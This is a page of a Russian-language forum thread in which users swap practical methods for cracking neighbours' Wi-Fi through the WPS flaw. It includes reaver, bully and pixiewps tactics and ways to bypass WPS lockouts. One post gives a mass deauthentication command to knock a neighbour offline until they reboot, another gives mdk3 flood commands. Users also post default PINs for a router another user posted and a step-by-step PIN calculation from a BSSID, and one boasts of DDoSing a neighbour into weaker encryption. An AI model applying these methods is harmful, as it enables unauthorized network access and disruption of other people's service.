Вход

Просмотр полной версии : Уязвимость в протоколе Wi-Fi Protected Setup


Страницы : 1 2 3 4 5 6 7 8 9 10 11 12 13 [14] 15 16 17 18 19 20

atlas28
23.02.2016, 16:39
По пакетам, к сожалению, ничего не подскажу. Но, возник вопрос, что мешает повторить атаку PixiWPS? Откуда такая уверенность, что прошивку поменяли вместе с именем сети и ключём? Или это из-за того, что не можете заставить работать адаптеры в нужном режиме?

Я тут вспомнил, что у меня тоже как-то была история с тем, что Reaver переставал ассоциироваться с нужно точкой доступа. Правда, это было при работе с Airslax на флешке. Первый запуск Reaver происходил нормально, а все последующие уже нет. Помогала только полная перезагрузка. После, на других сборках это как-то ушло само собой.

А по части блокирования WPS после 10-ти попыток подбора прочтите мои сообщения на последних двух-трех страницах. Может, натолкнёт на какие-нибудь мысли.



Повторить атаку мешает то, что ривер не может ассоциироваться с точкой, которая работает в режиме 802.11n only. aireplay-ng тоже не может: выдает ошибку 18.

Насчет прошивки: она в МГТСовских роутерах обновляется автоматически, насколько мне известно, так что, вероятно, даже если я смогу осуществуить PixieWPS атаку, она в этот раз может уже и не сработать, но попытаться я все же хочу.

Сообщения гляну, кстати, первую или даже первые две цифры пин-кода я кажись помню, так что перебор реален, если как-то решить проблему с локами.

fire-dance
23.02.2016, 19:07
Повторить атаку мешает то, что ривер не может ассоциироваться с точкой, которая работает в режиме 802.11n only. aireplay-ng тоже не может: выдает ошибку 18.

Насчет прошивки: она в МГТСовских роутерах обновляется автоматически, насколько мне известно, так что, вероятно, даже если я смогу осуществуить PixieWPS атаку, она в этот раз может уже и не сработать, но попытаться я все же хочу.

Сообщения гляну, кстати, первую или даже первые две цифры пин-кода я кажись помню, так что перебор реален, если как-то решить проблему с локами.



если хотябы первую цыфру вы помните то упростит получение пароля быстро зделайте атаку bylly она должна работать без проблем

Goldstein
23.02.2016, 19:52
Сегодня заметил странное... При атаке "mdk3 wlan d -b victim.txt -c 1" у точки появляются несколько(~20) левых mac адресов и замедляется процесс флуда на реальных клиентов. А от левых маков никакого ответа. Пришлось использовать aireplay на реальные маки. И это уже у второй точки. Может так провы борятся с флудом? или у меня паранойя и меня ищут? )

atlas28
23.02.2016, 23:54
если хотябы первую цыфру вы помните то упростит получение пароля быстро зделайте атаку bylly она должна работать без проблем



bully - это аналог ривера. Вся проблема в том, что точка лочится после 10 попыток и до ребута.

SlNik
24.02.2016, 00:03
избежать лока на точке Asus RT-N10E???

У когонибудь был подобный опыт?



Подождать пока точка разлочится. И взять её с помощью PixieScript.

СЕРЖ32
24.02.2016, 11:18
Да в теме уязвимых роутеров он есть

DEV FAq тема, чип там уязвимый RTL

Так что смело жми Pixie Script, если он будет залочен, ставь вечерком когда сосед сидит в инете и смотрит порнушку aierplay-ng

aireplay ng -0 1000000000 -a mac -c канал -mon0

Сосед от того, что инета нет, сам его перезагрузит, остается лишь следить за эфиром когда точка пропадет, чтобы остановить атаку.



есть такие соседы,которым пофиг.будет сидеть ждать чего то и не перезагружает

СЕРЖ32
24.02.2016, 11:19
bully - это аналог ривера. Вся проблема в том, что точка лочится после 10 попыток и до ребута.



та ну это фигня тогда.сам подумай.....ты всю жизнь эту точку так ломать будешь

Goldstein
24.02.2016, 20:34
Так эти 20 левых клиентов и прописаны в victim.txt

Каких реальных клиентов? Комманда срет в эфир в канал 1 , интерфейсом wlan d , точками из txt.

Это флуд атака на точку, Вам она к чему? Грузануть роутер? Отключить клиентов?



В victim.txt mac точки. Атака чтобы точку перезагрузить. Но атака замедляется, когда появляются левые маки, которые якобы подключены к точке. mdk3 переключается на их деассоциацию.



есть такие соседы,которым пофиг.будет сидеть ждать чего то и не перезагружает


да там вообще овощи... Я так понимаю там логика, что точка - оборудование прова и если её трогать, то "Всё капец!"

ob432
24.02.2016, 23:39
Повторить атаку мешает то, что ривер не может ассоциироваться с точкой, которая работает в режиме 802.11n only...



Попробовал на двух точках, которые работают в режиме 802.11n only и, действительно, ассоциации нет. Интересная особенность.

У Reaver есть ключ:

-A, --no-associate Do not associate with the AP (association must be done by another application)

У меня опыта работы с таким ключём нет. Может, тут "покопать"?

Или Вы уже это обошли, судя по последним сообщениям? Теперь вопрос с блокированием?

VasiliyP
25.02.2016, 00:11
Попробовал на двух точках, которые работают в режиме 802.11n only и, действительно, ассоциации нет.



А вы карту в соответствующий режим переводили?

iw | grep bitrate

iw dev wlan0mon set bitrates ht-mcs-2.4 0

ob432
25.02.2016, 01:11
А вы карту в соответствующий режим переводили?

iw | grep bitrate

iw dev wlan0mon set bitrates ht-mcs-2.4 0



"iw dev wlan0 set bitrates mcs-2.4 0" - к сожалению, безрезультатно.

atlas28
25.02.2016, 06:03
Попробовал на двух точках, которые работают в режиме 802.11n only и, действительно, ассоциации нет. Интересная особенность.

У Reaver есть ключ:

-A, --no-associate Do not associate with the AP (association must be done by another application)

У меня опыта работы с таким ключём нет. Может, тут "покопать"?

Или Вы уже это обошли, судя по последним сообщениям? Теперь вопрос с блокированием?



Этот ключ используется для ассоциации при помощи aireplay-ng, например

aireplay-ng wlan2mon --fakeauth 30 -a MAC

aireplay тоже ассоциироваться не может. Как я уже писал выше, обход нашел только использованием 802.11ac адаптера под виндой, но там проблема выполнить pixiewps атаку)

ob432
25.02.2016, 11:16
Этот ключ используется для ассоциации при помощи aireplay-ng, например

aireplay-ng wlan2mon --fakeauth 30 -a MAC

aireplay тоже ассоциироваться не может. Как я уже писал выше, обход нашел только использованием 802.11ac адаптера под виндой, но там проблема выполнить pixiewps атаку)



На сколько понял я, aireplay только делает попытки, а в другом окне reaver с ключём -А подбирает. Этап ассоциации в таком случае, reaver проходит. Дальше - нужно разбираться.

atlas28
25.02.2016, 19:26
На сколько понял я, aireplay только делает попытки, а в другом окне reaver с ключём -А подбирает. Этап ассоциации в таком случае, reaver проходит. Дальше - нужно разбираться.



Без ключа -А reaver всегда пытается ассоциироваться сам, а с этим ключом он этого не делает, но за него в соседнем окне это должен сделать aireplay. Однако в моем случае и aireplay этого сделать тоже не может, поэтом и работа ривера невозможна.

ob432
25.02.2016, 21:12
Без ключа -А reaver всегда пытается ассоциироваться сам, а с этим ключом он этого не делает, но за него в соседнем окне это должен сделать aireplay. Однако в моем случае и aireplay этого сделать тоже не может, поэтом и работа ривера невозможна.



При всём уважении, Вы сами это пробовали проделать? Я вчера вечером этот процесс немного "покрутил" и на основании этого написал.

atlas28
25.02.2016, 22:29
При всём уважении, Вы сами это пробовали проделать? Я вчера вечером этот процесс немного "покрутил" и на основании этого написал.



Разумеется, иначе зачем я тогда это пишу?) Я просто объяснил, как это работает. А без ассоциации с точкой ничего не получится, т. к. это требования протокола) Ключ -A используется в тех случаях, когда reaver сам не может ассоциироваться, но aireplay-ng может. У меня такое бывало, когда я ривер на openwrt запускал. Вот там меня -А выручал.

organizat
27.02.2016, 00:19
Помогите плиз ломануть d-link dsl-2640u. Wps открыт. Ривером лочится. Мас d8:fe:e3:07:69:30. Может кто ломал такой

henri2002
27.02.2016, 00:41
Помогите плиз ломануть d-link dsl-2640u. Wps открыт. Ривером лочится. Мас d8:fe:e3:07:69:30. Может кто ломал такой



46264848 | Static PIN - D-Link 1

76229909 | Static PIN - D-Link 2

62327145 | Static PIN - D-Link 3

Felis-Sapiens
27.02.2016, 12:39
Помогите плиз ломануть d-link dsl-2640u. Wps открыт. Ривером лочится. Мас d8:fe:e3:07:69:30. Может кто ломал такой



Попробуй, на всякий случай, вот эти WPSPIN: 17084215, 11105824, 20172527, 14169809

ob432
27.02.2016, 17:24
Разумеется, иначе зачем я тогда это пишу?) Я просто объяснил, как это работает. А без ассоциации с точкой ничего не получится, т. к. это требования протокола) Ключ -A используется в тех случаях, когда reaver сам не может ассоциироваться, но aireplay-ng может. У меня такое бывало, когда я ривер на openwrt запускал. Вот там меня -А выручал.



Ну, что ж, тогда могу посоветовать обратить внимание на программы под Android-устройства, такие как WifiAccess WPS WPA WPA2, AndroDumpper и им подобные. По крайне мере, эти две программы нормально работают с WPS с точками в режиме "802.11n only". Обе программы без проблем получали парольные фразы Wi-Fi по уже известным ключам WPS. В принципе, пока, для меня этого достаточно - все ключи WPS я сохраняю, что выручало не раз. Кстати, советую сохранять и MAC-адреса точек. Частенько бывает так, что меняется имя сети, а фраза и/или ключь остаются прежними.

А вот с подбором у них не всё так гладко. У них есть возможность подбора по словарям и заготовкам. Но, при подборе программой AndroDumpper точка не заблокировала WPS, а через WifiAccess как положено WPS был заблокирован через известное количество попыток. Конечно же, это не такой подбор как у Reaver, но всё же. Нужно поискать необходимую программу. По крайней мере, это вполне рабочий вариант для точек в режиме "802.11n only", пока не будет найдена причина, по которой Reaver отказывается работать с такими точками.

Есть Reaver и под Android, но он далеко не для всех устройств подходит - только для аппаратов с bcm4329/4330 wifi chipset.

TOX1C
27.02.2016, 23:51
Reaver сам по себе кривой как ..., это не удивительно. Столкнулся с такой проблемой, что ривер при переборе умудряется потушить впс на точках с чипсетами ралинк вплоть до перезагрузки. Используя штатное средство линукса, wpa_cli, точки не лочатся.

50_Terabytes
28.02.2016, 01:10
Но, при подборе программой AndroDumpper точка не заблокировала WPS, а через WifiAccess как положено WPS был заблокирован через известное количество попыток.



Одну и ту же ТД ломали? интересно, как это возможно, если точка должна залочиться после пятого пина, но она этого не делает. может есть обходные пути? хорошо бы узнать сам алгоритм программы.

ob432
28.02.2016, 14:06
Одну и ту же ТД ломали? интересно, как это возможно, если точка должна залочиться после пятого пина, но она этого не делает. может есть обходные пути? хорошо бы узнать сам алгоритм программы.



Да, "ломал" одну и ту же. Пишу в кавычках потому, что использовал точку для теста, про которую мне известно всё. И написал об особенностях подбора специально для того, что бы много от них не ждали. И эта имитация подбора AndroDumpper меня удивила. И имитация ли это? Пока не разобрался. Хотя, проект развивается, ошибки исправляются. А вот поддержка Wifiaccess прекращена.

Но, запрос парольных фраз по уже известным ключам WPS делал на нескольких точка в которых установлен режим "802.11n only". Обе программы справились без проблем.

50_Terabytes
28.02.2016, 15:59
Да, "ломал" одну и ту же. Пишу в кавычках потому, что использовал точку для теста, про которую мне известно всё. И написал об особенностях подбора специально для того, что бы много от них не ждали. И эта имитация подбора AndroDumpper меня удивила. И имитация ли это? Пока не разобрался. Хотя, проект развивается, ошибки исправляются. А вот поддержка Wifiaccess прекращена.

Но, запрос парольных фраз по уже известным ключам WPS делал на нескольких точка в которых установлен режим "802.11n only". Обе программы справились без проблем.



Мне просто интересно, каким образом они смогли обойти блокировку подбора... может стоит попробовать на других точках эта хрень работает или нет?

ob432
28.02.2016, 18:14
Мне просто интересно, каким образом они смогли обойти блокировку подбора... может стоит попробовать на других точках эта хрень работает или нет?



Да я, честно говоря, пока не уверен, что они обошли. Просто, меня такое поведение насторожило и я эту особенность специально отметил. Будет время и аппарат в руках поэксперементирую.

А по части "обойти" TOX1C чуть выше написал, что использование wpa_cli позволяет. Правда, у меня сразу не запустилось на Wifislax. Поэтому, попробовать не смог.

ctulhu111
29.02.2016, 01:13
хоть и не про WPS, но т.к. многие не могут добить TP-Link, подскажите кто-то пробовал такой вариант? http://www.backtrack-linux.org/forums/showthread.php?t=62673

atlas28
29.02.2016, 01:16
Ну, что ж, тогда могу посоветовать обратить внимание на программы под Android-устройства, такие как WifiAccess WPS WPA WPA2, AndroDumpper и им подобные. По крайне мере, эти две программы нормально работают с WPS с точками в режиме "802.11n only". Обе программы без проблем получали парольные фразы Wi-Fi по уже известным ключам WPS. В принципе, пока, для меня этого достаточно - все ключи WPS я сохраняю, что выручало не раз. Кстати, советую сохранять и MAC-адреса точек. Частенько бывает так, что меняется имя сети, а фраза и/или ключь остаются прежними.

А вот с подбором у них не всё так гладко. У них есть возможность подбора по словарям и заготовкам. Но, при подборе программой AndroDumpper точка не заблокировала WPS, а через WifiAccess как положено WPS был заблокирован через известное количество попыток. Конечно же, это не такой подбор как у Reaver, но всё же. Нужно поискать необходимую программу. По крайней мере, это вполне рабочий вариант для точек в режиме "802.11n only", пока не будет найдена причина, по которой Reaver отказывается работать с такими точками.

Есть Reaver и под Android, но он далеко не для всех устройств подходит - только для аппаратов с bcm4329/4330 wifi chipset.



Как я уже много раз написал выше: у меня нет необходимости использовать Android устройства, т. к. для того же самого перебора я могу юзать Dumpper+JumpStart под Windows, которые так же отлично работают с 802.11n only точками.

К сожалению, ответа на свой главный вопрос найти так и не смог. А именно: где найти Authkey? И можно ли его вообще вычислить, имея M1-M3 пакеты? Т. к. в них я нашел все данные для PixieWPS, кроме Authkey. Если кто имел с этим дело, отпишите.

ob432
29.02.2016, 19:28
... Dumpper+JumpStart под Windows, которые так же отлично работают с 802.11n only точками.



Да, Dumpper штука хорошая, если точка не лочится на определенные временные интервалы. Иначе, много ручной мороки. Но, как "последний шанс" вполне. Впрочем, проект пока развивается. Может, со временем усовершенствуют.

CRACK211
02.03.2016, 20:57
http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/ может кому будет интересно

Felis-Sapiens
02.03.2016, 21:25
http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/ может кому будет интересно



Давно известен. В Router Scan (WPS PIN Companion) этот алгоритм есть - D-Link PIN / D-Link PIN +1.

atlas28
02.03.2016, 22:08
Пару слов о том, что я писал выше, вернее, о результатах) Т. к. ситуация была безысходной, продолжительный дудос соседа deauth пакетами вынудил его сменить защиту на WEP) Так что теперь у меня и доступ есть, и пин записан.

Goldstein
23.03.2016, 13:37
Точка TL-WR720N. Брутил wps через reaver. После примерно ~500 попыток стало происходить странное.... После "Sending M2 message" появился таймаут. Это точка зависла или система защиты такая??? Поможет ли ребут?

fire-dance
23.03.2016, 14:21
Точка TL-WR720N. Брутил wps через reaver. После примерно ~500 попыток стало происходить странное.... После "Sending M2 message" появился таймаут. Это точка зависла или система защиты такая??? Поможет ли ребут?



скорей всего слабый сигнал пошел и ошибка сбилось, сохраняйте сесию, ночью как правило сигнал и ривер лутше

Goldstein
23.03.2016, 21:26
скорей всего слабый сигнал пошел и ошибка сбилось, сохраняйте сесию, ночью как правило сигнал и ривер лутше



сессию сохранил. вообщем глюк точки. Пришлось зафлудить её и после рестарта процесс пошёл )

Alvinng
25.03.2016, 22:18
Есть роутер BSSID: SAGEMCOM_ХХХХ. WPS лочится после 10 попыток, анлок только после ребута. Можно поставить в ривере задержку после 9-ти попыток? И на какое время ставить?

Mednik
25.03.2016, 22:23
В посте № 3299 попробуй команду может пройдет.

Alvinng
26.03.2016, 00:24
как успехи с этим sagemcom? если он перезагрузится то pin сменится



WARNING: Detected AP rate limiting, waiting 7205 seconds before re-checking



а у тебя мощный комп?



i7 3630QM, 8 Gb RAM, Nvidia GT650M

V777
26.03.2016, 13:21
И что мне с ней делать?))) Системник собирать только из за брута нет желания.

upd.: Прогнал InsidePRO за 2 часа 10 минут С ноутом всё в порядке. Грелся во время брута, но в пределах разумного. Никаких ошибок hashcat не выдал. Сутками подряд брутить с ноута конечно не стоит, но словарями 2-3 гига вполне можно. Главное поддерживать охлаждение в нормальном состоянии и регулярно проводить ТО.



закинь сюда свой хендшейк https://forum.antichat.ru/threads/417617/ или сюда https://forum.antichat.ru/threads/435763/ ... И не забудь сказать спасибо )))

Alvinng
26.03.2016, 13:55
закинь сюда свой хендшейк https://forum.antichat.ru/threads/417617/ или сюда https://forum.antichat.ru/threads/435763/ ... И не забудь сказать спасибо )))



Давно уже закинул, и не только туда.

startless
11.04.2016, 05:55
Ростелеком начал ставить роутеры ZTE ZXHN H118N c bssid D4:76:EA... WPS включен, но при попытке сбрутить принимает первую половину кода, какой бы она ни была, а дальше отбивает все попытки подобрать вторую часть. Не выходит, даже если брутить подряд без учета контрольной цифры. Атака Pixie не срабатывает. Точка находится очень близко, сигнал отличный, адаптер TP-Link TL-WN7200ND, в бою многократно проверен, ОС Kali 2.0. Какие у кого есть мысли? Кто-нибудь сталкивался?

Triton_Mgn
11.04.2016, 10:55
Ростелеком начал ставить роутеры ZTE ZXHN H118N c bssid D4:76:EA... WPS включен, но при попытке сбрутить принимает первую половину кода, какой бы она ни была, а дальше отбивает все попытки подобрать вторую часть. Не выходит, даже если брутить подряд без учета контрольной цифры. Атака Pixie не срабатывает. Точка находится очень близко, сигнал отличный, адаптер TP-Link TL-WN7200ND, в бою многократно проверен, ОС Kali 2.0. Какие у кого есть мысли? Кто-нибудь сталкивался?



Для начала надо поймать пару хендшейков с таких роутеров, выложить в тему перебора паролей, если удастся сбрутить думаю там будут стоять как всегда идентичные пароли, Ростелеком в этом давно замечен. Потом будет от чего отталкиваться.

TOX1C
11.04.2016, 11:07
там будут стоять как всегда идентичные пароли



или пароли, сгенеренные по известному алгоритму, как это с дурдом.ру-шными роутерами было) zte - оно ж дырявое по самое нехочу

startless
11.04.2016, 13:03
Похоже новую ревизию выпустили, такая серия MAC-адресов ни в гугле, ни в shodan не светится. Хендшейк пока проблематично словить - за 4 дня работы роутера ни одного коннекта. Ощущение, что там просто не знают, как поженить с ним свои смартфоны...

TOX1C
11.04.2016, 14:51
принимает первую половину кода, какой бы она ни была, а дальше отбивает все попытки подобрать вторую часть



он не принимает первую часть кода, он неправильно завершает eapol сессию, а ривер думает, что первая половина прошла успешно. и не может подобрать вторую, так как первая неправильная тоже.

startless
12.04.2016, 07:43
И что посоветуете? Как его поиметь? Я уже, кажется, все варианты ключей перепробовал. С задержками может поиграть? Bully его вообще не берет, крутит один и тот же пин бесконечно...

Triton_Mgn
12.04.2016, 08:16
И что посоветуете? Как его поиметь? Я уже, кажется, все варианты ключей перепробовал. С задержками может поиграть? Bully его вообще не берет, крутит один и тот же пин бесконечно...



Я же говорил выложите хендшейк в тему бесплатного подбора пароля.

startless
12.04.2016, 10:44
может все таки адаптер tp-link 7200nd криво работает, по моему он с ривером плохо дружится, у меня такой же был, поменял на альфу, все стало чудесно....



Контрольный проход по взломанным точкам подтверждает, что адаптер работает как надо. Открылись другие подробности - Airodump обнаружил версию WPS 1.0 PBC, то бишь запуск WPS с кнопки. Может потому атака reaver безуспешна?

startless
15.04.2016, 06:54
При продолжительной работе airodump-а случайно обнаружил, что, порой, в поле "Probe" проскакивает заветный пароль! Похоже, что кто-то забивает его качестве названия своего устройства. Уже три таких попалось... Получается, что просто запускаешь airodump и слушаешь эфир. Потом внимательно изучаешь ассоциацию клиентов и AP и пробуешь пароль - он обычно выделяется на фоне просто названий AP и устройств.

Triton_Mgn
15.04.2016, 07:19
При продолжительной работе airodump-а случайно обнаружил, что, порой, в поле "Probe" проскакивает заветный пароль! Похоже, что кто-то забивает его качестве названия своего устройства. Уже три таких попалось... Получается, что просто запускаешь airodump и слушаешь эфир. Потом внимательно изучаешь ассоциацию клиентов и AP и пробуешь пароль - он обычно выделяется на фоне просто названий AP и устройств.



Это пытался подключиться Андрюша перебирая сети.

Не все так просто . ведь прослушивания mitm или arp все же небыло. - хоть , что то понять

Я же говорю , начни с ручного режима

startless
15.04.2016, 08:09
Ручной режим уже в процессе, хендшейк словлен и брутится.

Согласен, не все так просто. Но к трем точкам пароль словил именно так! Рекомендую попробовать...

Triton_Mgn
15.04.2016, 08:10
Мы всегда за ручки.

Ну где же ваши ручуки лалалалалала

binarymaster
15.04.2016, 16:42
При продолжительной работе airodump-а случайно обнаружил, что, порой, в поле "Probe" проскакивает заветный пароль! Похоже, что кто-то забивает его качестве названия своего устройства. Уже три таких попалось... Получается, что просто запускаешь airodump и слушаешь эфир. Потом внимательно изучаешь ассоциацию клиентов и AP и пробуешь пароль - он обычно выделяется на фоне просто названий AP и устройств.



Скорее всего просто удачное совпадение, вбивали пароль вместо имени сети по ошибке.

Но стоит взять на заметку, как вариант.

startless
16.04.2016, 03:11
Скорее всего просто удачное совпадение, вбивали пароль вместо имени сети по ошибке.

Но стоит взять на заметку, как вариант.



За два дня работы airodumpa таким способом открыл 5 точек. Это при том, что сканировал эфир в двух местах - дома и на работе. Так что это точно не случайность. Уже работаю над таблицей ассоциации точек и клиентов. По сути, в скане фиксируются любые устройства, попадающие в зону действия моего адаптера, пытающиеся подключиться к известным им сетям и передающие пароль в качестве своего ID.

startless
16.04.2016, 08:45
Сегодня получил из Китая адаптер Kasens N9600. Попытался снова пройтись ривером по этой точке из Kali 2.0 и WifiSlax - снова ничего: wifislax гоняет по кругу один и тот же пин, кали также неправильно определяет первую половину пина. Наудачу попробовал софт "изкаробки" - тут прилагается Xiaopan OS для загрузки с диска или виртуалки. Прикрутил на виртуалку и ... о, чудо! minidwep уверенно так сбрутил первую часть, сейчас уже прошел 93%.

Triton_Mgn
16.04.2016, 22:16
Если не залипнет на 99% гоняя один и тот же ПИН отпишитесь.На самом деле

может показаться, что первая часть подобрана, в итоге все печально.

startless
17.04.2016, 05:25
Мда, рано радовался. Все те же грабли. Первая часть якобы подобралась, вторая дошла до 99% и зациклилась. Запустил все заново, первая часть пина определилась иначе. Все, как сказал Triton_Mgn, печально...

binarymaster
17.04.2016, 14:52
Подскажите, каким образом можно "выдернуть" Pixiewps 1.1 из Kali 2.0 и запустить на Kali 2016.1?



Грамотнее запостить это в трекер на гитхабе:

https://github.com/t6x/reaver-wps-fork-t6x/issues

Потому как это в явном виде баг.

Sves
17.04.2016, 15:40
Грамотнее запостить это в трекер на гитхабе:

https://github.com/t6x/reaver-wps-fork-t6x/issues

Потому как это в явном виде баг.



Согласен, спасибо!

Только как я понимаю, это баг не reaver, а pixiewps?

binarymaster
17.04.2016, 15:43
Согласен, спасибо!

Только как я понимаю, это баг не reaver, а pixiewps?



В целом да, может быть ещё правильнее написать ему.

Но последний коммит у него был в начале года, так что может он отреагирует не столь быстро.

VladimirV
17.04.2016, 22:12
Следил по Вашим советам за подписями ассоциаций. У меня выскочило, цитирую дословно - "мне жалко WIFI". Я присел, хотя и сидел!

iworch
19.04.2016, 17:42
За два дня работы airodumpa таким способом открыл 5 точек. Это при том, что сканировал эфир в двух местах - дома и на работе. Так что это точно не случайность. Уже работаю над таблицей ассоциации точек и клиентов. По сути, в скане фиксируются любые устройства, попадающие в зону действия моего адаптера, пытающиеся подключиться к известным им сетям и передающие пароль в качестве своего ID.



фильтр для вайршарка не подскажете для вывода только "Probe .."

binarymaster
19.04.2016, 17:52
Немного повозившись, пришёл к такому алгоритму



Добавил алгоритм в Router Scan WPS PIN Companion.

hydra
19.04.2016, 17:59
фильтр для вайршарка не подскажете для вывода только "Probe .."



Frame type Filter

Management frames wlan.fc.type eq 0

Control frames wlan.fc.type eq 1

Data frames wlan.fc.type eq 2

Frame subtype Filter

Association request wlan.fc.type_subtype eq 0

Association response wlan.fc.type_subtype eq 1

Probe request wlan.fc.type_subtype eq 4

Probe response wlan.fc.type_subtype eq 5

Beacon wlan.fc.type_subtype eq 8

Authentication wlan.fc.type_subtype eq 11

Deauthentication wlan.fc.type_subtype eq 12

TOX1C
19.04.2016, 21:06
некоторые роутеры Airocon



В таблице не увидел, но этот девайс скорее всего тоже к уязвимым относится. Просьба проверить на живом примере.

74:d0:2b:84:41:d7 13850319 ASUS DSL-N10E

Felis-Sapiens
19.04.2016, 21:18
В таблице не увидел, но этот девайс скорее всего тоже к уязвимым относится. Просьба проверить на живом примере.

74:d0:2b:84:41:d7 13850319 ASUS DSL-N10E



Не подходит. В таблице все устройства из базы 3wifi, у которых WPSPIN соответствует этому алгоритму.

TOX1C
19.04.2016, 21:45
Значит у асусов какой-то свой алгоритм. Тоже на базе мак-адреса, заметил, что у них пин-коды идут блоками, в одном блоке много пинов, начинающихся на 0, у других на 4 и т.д.

henri2002
19.04.2016, 23:33
Добавил алгоритм в Router Scan WPS PIN Companion.


можете отдельно выложить компаньон.

atlas28
20.04.2016, 00:25
Подскажите, пожалуйста, как правильно подобраться к скрытой точке Reaver-ом?



По BSSID не работает? Тогда для начала попробуй узнать ESSID. Просто запусти airodump и слушай эту точку, пока к ней кто-нибудь не подключится. А потом уже добавишь этот параметр в ривер.

Sves
20.04.2016, 00:42
По BSSID не работает? Тогда для начала попробуй узнать ESSID. Просто запусти airodump и слушай эту точку, пока к ней кто-нибудь не подключится. А потом уже добавишь этот параметр в ривер.



По BSSID не соединяется. ESSID знаю, но тоже не может соединиться ([!] WARNING: Failed to associate with 58:6D:8F:63:ХХ:ХХ (ESSID: Touareq)).

binarymaster
20.04.2016, 01:10
можете отдельно выложить компаньон.



Я скорее на JS перепишу, и впихну в 3WiFi. В качестве бонуса, так сказать.

См. https://forum.antichat.ru/posts/3975583

startless
20.04.2016, 04:03
Следил по Вашим советам за подписями ассоциаций. У меня выскочило, цитирую дословно - "мне жалко WIFI". Я присел, хотя и сидел!



Из неизданного, так сказать:

Ne Podklyuchaisya Ko mne@

mne_ne_zjalko))

Hren wam\ a ne wi-fi

atlas28
20.04.2016, 16:30
По BSSID не соединяется. ESSID знаю, но тоже не может соединиться ([!] WARNING: Failed to associate with 58:6D:8F:63:ХХ:ХХ (ESSID: Touareq)).



Попробуй выполнить ассоциацию при помощи aireplay-ng (--fakeauth), а в ривере указать ключ -A.

А вообще WPS то там точно включен?

atlas28
23.04.2016, 23:31
Пока не проверял, но автор написал, что исправил баг в pixiewps 1.2 с роутерами SERCOMM https://github.com/wiire/pixiewps/issues/25

UPD: проверил, работает, однако приходится очень долго ждать, если явно не указать дату (--start --end). В 1.1 такого не было. Отписал автору.

CRACK211
27.04.2016, 09:34
подскажите пожалуйста , есть ли алгоритмы для zte? билайн 4g.

ZTE 4G Wi-Fi Router MF65M

TOX1C
27.04.2016, 16:47
Какие же там мерзкие пароли с завода стоят. Нужен и для них алгоритм, благо не в них одних он используется.



но по WPS ничего не нашёл



в укротелекомовских старых роутерах zte тоже нет пина впс в админке, но пин то есть, и для всех одинаковый

CRACK211
27.04.2016, 16:59
Какие же там мерзкие пароли с завода стоят. Нужен и для них алгоритм, благо не в них одних он используется.

в укротелекомовских старых роутерах zte тоже нет пина впс в админке, но пин то есть, и для всех одинаковый



и какой же если не секрет?

TOX1C
27.04.2016, 17:29
94229882

binarymaster
27.04.2016, 18:45
http://s8.hostingkartinok.com/uploads/images/2016/04/c872d99e63ab45e66efc911422812b11.png


Красота-то какая!

fire-dance
27.04.2016, 19:09
Красота-то какая!


я так понимаю что скоро будет внедрение в роутер скан в некоторые асус модели?

binarymaster
27.04.2016, 19:20
я так понимаю что скоро будет внедрение в роутер скан в некоторые асус модели?



Да, я уже добавил алгоритм в генератор на 3WiFi.

Было бы здорово поиметь полный список OUI, как это сделал ранее @VladimirV (https://forum.antichat.xyz/members/231395/), чтобы привязать алгоритм к функции Suggest.

VladimirV
27.04.2016, 20:08
Да, я уже добавил алгоритм в генератор на 3WiFi.

Было бы здорово поиметь полный список OUI, как это сделал ранее @VladimirV (https://forum.antichat.xyz/members/231395/), чтобы привязать алгоритм к функции Suggest.



Вот полное соответствие:

http://rghost.ru/private/6zhZRdbf6/4a15e859115c44ac407f39f8a1c542f0

В сообщение не влазит!

PleBeY
27.04.2016, 21:59
ASUSTek Wireless Router WL520gu ASUS Wireless Router

48:5B:39:42:B2:39

Абсолютно неприступный, ничем не берет ,что делать???

По последнему алгоритму не подойдет насколько я понял?

----------------------------------------------------------------------

нашел в базе 3wifi

несколько BSSID

48:5B:39:42:B0:52 ---------- 14619052

48:5B:39:42:B2:0F ---------- 89730652

48:5B:39:42:B2:72 ---------- 81268788

48:5B:39:42:B1:B8 ---------- 53081049

48:5B:39:42:BA:47 ---------- 21034992

возможно ли вычислить алгоритм и пин для этого BSSID 48:5B:39:42:B2:39

Felis-Sapiens
27.04.2016, 23:56
А можно для чайников пооперационно на примере показать подсчёт?



BSSID = 60:A4:4C:84:25:38

b1 + b2 + b3 + b4 + b5 = 0xA4 + 0x4C + 0x84 + 0x25 + 0x38 = 0x1D1 (= 465)

p0 = (0x60 + 0x38) mod (10 - (0 + 465) mod 7) = 152 mod (10 - 3) = 152 mod 7 = 5

p1 = (0xA4 + 0x38) mod (10 - (1 + 465) mod 7) = 220 mod 6 = 4

p2 = (0x4C + 0x38) mod (10 - (2 + 465) mod 7) = 132 mod 5 = 2

p3 = (0x84 + 0x38) mod (10 - (3 + 465) mod 7) = 188 mod 4 = 0

p4 = (0x25 + 0x38) mod (10 - (4 + 465) mod 7) = 93 mod 10 = 3

p5 = (0x38 + 0x38) mod (10 - (5 + 465) mod 7) = 112 mod 9 = 4

p6 = (0x60 + 0x38) mod (10 - (6 + 465) mod 7) = 152 mod 8 = 0

s = wps_checksum(5420340) = 2

WPSPIN = 54203402

Кстати, уже реализовано здесь: http://3wifi.stascorp.com/wpspin

binarymaster
28.04.2016, 00:13
Мне наконец-то удалось составить алгоритм генерации WPSPIN для некоторых моделей ASUS (и, как оказалось, Airocon).



Удалось добыть точку, которая никак иначе не давалась.

Кстати, как удалось воссоздать алгоритм? Он ведь довольно не простой, тут либо реверс-инжиниринг прошивок, либо какие-то методы математического анализа. И ещё он чем-то похож на предыдущий Airocon-овский.

TOX1C
28.04.2016, 00:18
еще бы алгоритм туполинка раскрутили



О да, как же у меня от этих туполинков печет, не сбрутился пасс-соси лапу. А расколдованный алгоритм я уже опробовал на rt-n10u, которые пикси не берет, пасс оказался крайне простой, но хендшейк я перехватить не мог никак.

RomanxD
28.04.2016, 00:20
binarymaster,

почему взятый с исходников wpspin.html не генерирует?

binarymaster
28.04.2016, 00:33
binarymaster,

почему взятый с исходников wpspin.html не генерирует?



HTML файлы в репозитории в немного нестандартном формате, специально для встроенного шаблонизатора.

Но там внутри всё должно быть понятно.

CRACK211
28.04.2016, 07:16
Самое радостное то что люди настолько уверенны в неуязвимость Асусов в плане wps что в 99% случаев не выключают его)))в отличии от дырявых zyxel, на них очень частот стали выключать wps )

startless
28.04.2016, 13:13
Чувак, ты просто гений!

А вообще, сколько алгоритмов можно вскрыть благодаря тому, что создали базу 3wifi! Надо только ее проанализировать.

skasus
29.04.2016, 10:37
